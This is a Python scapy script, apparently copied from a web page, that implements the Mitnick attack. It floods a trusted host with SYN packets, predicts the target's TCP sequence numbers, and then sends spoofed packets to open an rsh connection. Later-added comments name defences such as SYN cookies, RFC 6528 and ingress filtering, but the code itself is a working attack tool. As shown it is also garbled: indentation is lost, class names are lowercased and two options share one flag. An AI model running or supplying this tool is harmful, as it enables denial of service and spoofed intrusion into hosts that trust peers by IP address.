偽造TCP連線


#!/usr/bin/python

#coding=utf-8

import optparse

from scapy.all import *

# Send one packet per source port to TCP port 513 on `tgt`, with `src`
# written into the IP source field.
#
# src: address placed in the IP header as the sender.
# tgt: address the packets are delivered to.
#
# No TCP flags are set explicitly; the function name and the caller's status
# message describe these packets as SYNs.
#
# Defensive note: on the receiving host this shows up as a burst of connection
# attempts to port 513 from a single source address whose source ports climb
# by one (1024 through 65534). SYN cookies and a bounded listen backlog on the
# listener, plus anti-spoofing (ingress) filtering at the network edge, are
# the standard countermeasures.
# NOTE(review): indentation was lost on this page; the statements after the
# `for` line are presumably its body -- confirm against the original source.
def synflood(src, tgt):

# The TCP source port increases by one each iteration; destination port 513 stays fixed.

for sport in range(1024, 65535):

iplayer = ip(src=src, dst=tgt)

tcplayer = tcp(sport=sport, dport=513)

pkt = iplayer / tcplayer

send(pkt)

# Probe `tgt` four times, read the TCP sequence number from each reply, and
# return the last sequence number plus the difference between the last two.
#
# tgt: address the probes are sent to.
# Returns: seqnum + diffseq, an extrapolation of the next sequence number.
#
# Defensive note: the extrapolation is only meaningful when the remote stack
# issues initial sequence numbers that advance by a steady amount. Stacks that
# generate ISNs as described in RFC 6528 ("Defending against Sequence Number
# Attacks") do not have that property, which is the mitigation for this
# class of attack.
# NOTE(review): indentation was lost on this page, so which of the statements
# below belong to the loop body cannot be determined from the listing.
def caltsn(tgt):

seqnum = 0

prenum = 0

diffseq = 0

# Repeat the probe four times.

for x in range(1,5):

# If this is not the first SYN sent, set the previous sequence number to the
# sequence number of the last SYN/ACK received.

# The earlier condition had a logic problem; it is left commented out:

# if prenum != 0:

if seqnum != 0:

prenum = seqnum

# Build and send a TCP SYN packet, waiting for one reply.

pkt = ip(dst=tgt) / tcp()

ans = sr1(pkt, verbose=0)

# Read the TCP sequence number from the SYN/ACK reply.

seqnum = ans.getlayer(tcp).seq

# A difference can only be computed once a previous sample exists.
if prenum != 0:

diffseq = seqnum - prenum

print "[*] prenum: %d seqnum: %d" % (prenum, seqnum)

print "[+] tcp seq difference: " + str(diffseq)

print

return seqnum + diffseq

# 偽造tcp連線

# Send two packets from port 513 to port 514 on `tgt` with `src` as the IP
# source address: the first carries no acknowledgement number, the second
# carries `ack`.
#
# src: address written into the IP source field of both packets.
# tgt: address both packets are sent to.
# ack: acknowledgement number placed in the second packet.
#
# Defensive note: 513 and 514 are the conventional rlogin/rsh ports. This
# exchange presumably only matters where the service on `tgt` trusts a peer
# by its IP address alone (r-services host trust) -- not shown in this file.
# Retiring the r-services in favour of an authenticated, encrypted protocol
# such as SSH, and never using a source address as a credential, removes the
# exposure.
def spoofconn(src, tgt, ack):

print '[*] attack tcp connection number : ' + str(ack)

# Send the TCP SYN packet.

iplayer = ip(src=src, dst=tgt)

tcplayer = tcp(sport=513, dport=514)

synpkt = iplayer / tcplayer

send(synpkt)

# Send the TCP ACK packet (same addresses and ports, with the ack number set).

iplayer = ip(src=src, dst=tgt)

tcplayer = tcp(sport=513, dport=514, ack=ack)

ackpkt = iplayer / tcplayer

send(ackpkt)

# Command-line entry point: parse three address options, then call synflood,
# caltsn and spoofconn in that order.
#
# Options read: synspoof (source address for the flood), srcspoof (source
# address for the spoofed connection) and tgt (target address).
# NOTE(review): both spoof-source options are registered under '-s' on this
# page, so they cannot be told apart as shown.
# NOTE(review): indentation was lost on this page; the statements after
# `else:` are presumably its body -- confirm against the original source.
def main():

parser = optparse.optionparser('[*]usage: python mitnickattack.py -s -s -t ')

parser.add_option('-s', dest='synspoof', type='string', help='specifc src for syn flood')

parser.add_option('-s', dest='srcspoof', type='string', help='specify src for spoofed connection')

parser.add_option('-t', dest='tgt', type='string', help='specify target address')

(options, args) = parser.parse_args()

# All three options are required; if any is missing, print the usage text and
# stop. The exit status is 0 even though nothing was done.
if options.synspoof == none or options.srcspoof == none or options.tgt == none:

print parser.usage

exit(0)

else:

synspoof = options.synspoof

srcspoof = options.srcspoof

tgt = options.tgt

print '[+] starting syn flood to suppress remote server.'

# The flood is addressed to the srcspoof host, with synspoof as its source.
synflood(synspoof, srcspoof)

print '[+] calculating correct tcp sequence number.'

# One is added to the estimate returned by caltsn before it is used as the
# acknowledgement number.
seqnum = caltsn(tgt) + 1

print '[+] spoofing connection.'

spoofconn(srcspoof, tgt, seqnum)

print '[+] done.'

# Call main() only when the file is executed directly, not when it is imported.
if __name__ == '__main__':

main()
